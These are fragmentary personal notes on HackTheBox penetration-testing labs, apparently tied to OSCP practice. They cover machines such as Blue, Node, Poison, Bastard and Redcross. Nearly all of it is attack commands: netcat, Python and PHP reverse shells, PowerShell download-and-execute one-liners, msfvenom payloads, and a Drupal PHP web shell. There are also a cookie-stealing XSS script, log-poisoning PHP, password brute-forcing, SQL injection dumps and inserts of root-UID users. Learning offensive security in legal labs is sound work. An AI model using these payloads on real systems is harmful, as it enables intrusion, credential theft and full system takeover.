Machines Practice

Follow this medium series for OSCP based Hackthebox machines writeups without MSF by Rana :)


one way to get root file

sudo /usr/bin/vi /var/www/html/../../../root/root.txt

2nd way

[email protected]:/home/haris$ sudo /usr/bin/vi /var/www/html/a :set shell=/bin/sh :shell

3rd way

sudo vi /var/www/html/a -c ':!/bin/sh'

python '' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9001 >/tmp/f"



nmap -n -v -Pn -p80,135,139,445,8080,49666,49667 -A --reason -oN nmap.txt
masscan -e tun0 -p1-65535,U:1-65535 --rate=700
smbmap -H -u guest -R | tee smbmap.txt
mount -t cifs -o rw,username=guest,uid=0,gid=0 //



mount -t cifs // /mnt -o user=,password=
find /mnt/ -type f
guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2 -sam SAM -security SECURITY -system SYSTEM LOCAL
java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7



echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);" >

/dev/shm - writable directory

sudo -u scriptmanager bash

upload reverse shell if normal shell not working

python -c 'import pty;pty.spawn("/bin/bash")'




hydra -l admin -P rockyou.txt http://ip http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username" - not working ip block



find . | grep controllers

ldd --version - cat /etc/lsb-release

One solution to get root

Create one file



Other trick to get exploit for ubuntu version --------- Rational love exploit


Blue - window machine

Eternal blue : ms 17-010

nmap -p 445 --script safe -Pn -n ip [nmap -p 445 --script "vuln and safe" -Pn -n ip]

Eternal blue exploit manually :

modify the python exploit and put location in our payload

Exploit modification required

add computer name in to host file and then scan smb servers

smbclient -L \ -N

smbclient \\haris-pc\Users

python ip ntsvcs


Sense - Linux Machine - PFsense

manual cmd injection


on attacker machine run this command

nc -vnlp port < cmd

In cmd we have this reverse shell code

import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("",3456)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2)["/bin/sh","-i"])

nc -lvnp 3456

exploit-db exploit



port 80 is opening httpfileserver

tcpdump -i tun0 %00{.exec|ping}

use invoke-powershelltcp.ps1

C:\Windows\SysWow64 - 32 bit windows C:\Windows\system32 - 32 bit windows C:\Windows\Sysnative - 64 bit

C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe ping

ctrl shift u - to decode

C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://ip:port/InvokePowerhsleltcp.ps1').}

sherlock script execute to get the false positive patches

New-Object Net.WebClient}.downloadString('http://ip:port/InvokePowerhsleltcp.ps1')

Invoke-PowerShellTcp -Reverse -IPAddress -Port 1234

New-Object Net.WebClient}.downloadString('')


cd /poweshell/Empire/data/module_source/privesc/Invoke-MS16032

IEX(New-Object Net.WebClient).downloadString('')

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('')"


Node - Linux

3000- node

sed 's/,/\n/g' notes - password extract


crack the hashes online and offline

Hashes crack with hashcat and john hashcat -a0 -m 1400 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /usr/share/dict/rockyou.txt john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt cat /home/alamot/.john/john.pot

online -

grep -Ri password . | less

fcrackzip for zip files password cracker fcrackzip -D -p /usr/share/wordlists/rockyou.txt

download file with wget ; wget --header "Cookie: connect.sid=s%3AuGlwY_gicWrNb2ESIiDzUPn9TTi-Dstj.5E1wGaKmQ7QgeS%2BC5%2FfZ3mjy8DCwSdySPOv4rRvvZfU"

base64 -d myplace.backup >myplace

privsec to tom user

mongo -u 'mark' -p '5AYRft73VtFpc84k' scheduler

find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null

db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );

find / -perm -4000 2>/dev/null

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 "asd /bin/bash asd"

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 r??t/roo?.txt

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 root

using wildcard /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /rt/rt.txt | base64 -d >

command injection:

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'aaa\n/bin/sh\nls')"


Legacy - windows

Samba Scan

nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns
First Exploit - ms08-67
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python 6 445

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python rev_10.10.14.14_443.exe

host file with smbserver a /usr/share/windows-binaries/



heartbleed vulnerability

python -n 100 ip

for i in ${seq 0 100}; do python ip; done

then find hype.key (hex to ascii)

ssh key and use this key and password get from heartbleed

ssh -i hype.key [email protected]

check the history and check ps elf | grep root

2nd exploit

gcc -pthread dirty.c -o dirty -lcrypt

su -


Fuzzy web app challenge‌

gobuster -u -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌

gobuster -u -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌

wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt​‌

wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt​‌

====================================== HDC HackTheBox Web Challenge Walkthrough/Solution‌

so the doProcess() function submits the form data to the jquery, Then i had a look at jquery-3.2.1.js CTRL+F and searched for the doProcess()‌

credentials stored in js file doprocess function‌

find emails on secret folder then run bruteforce in to all emails and get the flag‌


Lernaean Web Challenge — HackTheBox‌

hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/:password=^PASS^:Invalid Password!" -s 53593‌

========================================= CARTOGRAPHER‌

username= ’- and password= ‘ - sql injection‌


[20 Points] Lernaean [by Arrexel]‌

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/:password=^PASS^:Invalid password!" -s 35414‌

=========================================== [50 Points]‌

I know Mag1k [by rkmylo]‌

padbuster 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"‌

padbuster 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}"


Bastard - windows

Drupal payload chnages

$url = ''; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint'; $phpcode = <<<'EOD' <?php if (isset($_REQUEST['fuplaod'])) { file_put_contents($_REQUEST['fupload'], file_get_contents("" . $REQUEST['fupload'])); }; if (isset($_REQUEST['fexec'])) {

echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";

}; ?> EOD; $file = [ 'filename' => 'sam.php', 'data' => $ippsec ];

IEX(New-Object Net.WebClient).downloadString('')

\\\sam\ms15-051x64.exe "\\sam\nc64.exe -e cmd.exe 443" [#] ms15-051 fixed by zcgonvh powershell iex(new-object net.webclient).downloadstring('')

\\a\ms15-051x64.exe "\\a\nc64.exe -e cmd.exe 443"

powershell iex(new-object net.webclient).downloadstring('')


powershell iex(new-object net.webclient).downloadstring('')

Shell with Nishang

python "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('')"

\\\share\ms15-051x64.exe "whoami"
\\\share\ms15-051x64.exe "\\\share\nc64.exe -e cmd.exe 443"


Poison - machine is vulnerable to lfi

add this shell in to user agent

User-Agent: 0xdf: <?php system($_GET['c']); ?>

then check the logs &c=id

connectivity check

tcpdump -i tun0 icmp

view-source: 8081
nc -lnvp 8081

Shell as WWW

Visit view-source:;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f,

Listening on localhost:

netstat -an -p tcp
ps -auwwx | grep vnc

Tunneling / VNC connection

tail /etc/proxychains.conf
ssh [email protected] -D 8081
proxychains vncviewer -passwd secret

Looking inside /root/.vnc/, there’s a passwd file that matches the file secret:

python /opt/ -d -f secret

LFi Filter :- php://filter/convert.base64-encode/resource=index.php

Request to add data in php variable which is visible on phpinfo.

Content-Type: multipart/form-data; boundary=--PleaseSubscribe

Content-Length: 166 ----PleaseSubscribe

Content-Disposition: form-data; name="sam"; filename="Leaveacomment"


Please share my videos



python id_rsa > braingfuck-crack

john brainfuck-crack --wordlist=/usr/share/wordlis ts/rockyou.txt

wpscan –url https://brainfuck.htb –disable-tls-checks

cp /usr/share/exploitdb/exploits/php/webapps/40939.txt .

wordpress exploit -> smtp cred -> smtp cred to get secret forum password - > Encryption decryption

ssh2john id_rsa > id_john

john id_john –wordlist=/usr/share/wordlists/rockyou.txt

In orestis home directory there are a few files debug.txt, encrypt.sage and output.txt After some google searching, it turns out to be RSA encryption. RSA encryption relies on three prime numbers P, Q, E (two small and one large) python -c “print format(24604052029401386049980296953784287079059245867880966944246662849341507003750, ‘x’).decode(‘hex’)” 6efc1a5dbb8904751ce6566a305bb8ef


grandparents (granny & grandpa

granny & grandpa

iptables -A OUTPUT -d -j DROP

davtest --url

move options check move ippsec.html destination ippsec.aspx

ms14-070 exploit work for root ms15-051 - not work

curl -X PUT --data -binary @shell.aspx curl -X MOVE -H 'Destination: 5/shell.aspx'


Reverse shell on metasploit

check 3 exploits for privilege escalation : ms16-016 ms15-051 ms14-058 - working fine msf5 exploit(windows/local/ms14_058_track_popup_menu)


Microsoft IIS WebDav ‘ScStoragePathFromUrl’ Remote Buffer Overflow


. Use exploit/windows/iis/iis_webdav_scstoragepathfromurl. As we can see below, set options. << use exploit/windows/iis/iis_webdav_scstoragepathfromurl>> << options >> << set RHOST>> <<set LHOST <attacking machine ip> >> <<set LPORT 1234>>

<< use exploits/windows/local/ms15_051_client_copy_image >> << options >>



wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
gobuster -k -u https://intra.redcross.htb/documentation -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,pdf -t 20

Xss payload in to contact us form

<script>new Image().src=""+document.cookie;</script>


On submitting the UserID filter, I’m sent to https://intra.redcross.htb/?o=1&page=app, where o= is the id filtered on. If I try with a ' in there, https://intra.redcross.htb/?o=1'&page=app:

sqlmap -r app.request --delay=1 --batch --dump
sqlmap -r login.req --risk=3 -p o --dbms=mysql --random-agent --delay=1.0 --technique=UE -T users --dbs
nmap -p- --min-rate 5000
python -c "ping -c 1" -t [email protected] -m
tcpdump -i tun0 -n icmp
python -c "php -r '\$sock=fsockopen(\"\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -t [email protected] -m

Injection RCE

Brup Suite RCE :


Priv esc to penelope

s = smtplib.SMTP(mailserver,1025)
./ -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);'" -t [email protected] -f [email protected] -m redcross

Priv esc to root

[email protected]:/etc$ psql -h -U unixnss -W unix
openssl passwd -1 0xdf
insert into passwd_table (username, passwd, gid, homedir) values ('penel0xdf', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 1000, '/home/penelope');

Path 1: sudoers Group

insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope');
sudo su

Path 2: Via unixnssroot

unix=> insert into passwd_table (username, passwd, gid, homedir) values ('ro0xdft', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, '/root');

Find psql Configs

ls -l nss-pgsql*
cat nss-pgsql-root.conf
psql -h -U unixnssroot -p 5432 -d unix

This user can add a user with user id 0 (root):

insert into passwd_table (username, passwd, uid, gid, homedir) values ('r0xdfot', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, 0, '/root');
su r0xdfot

Using this account, we are able to create a new user with UID 0:

insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root');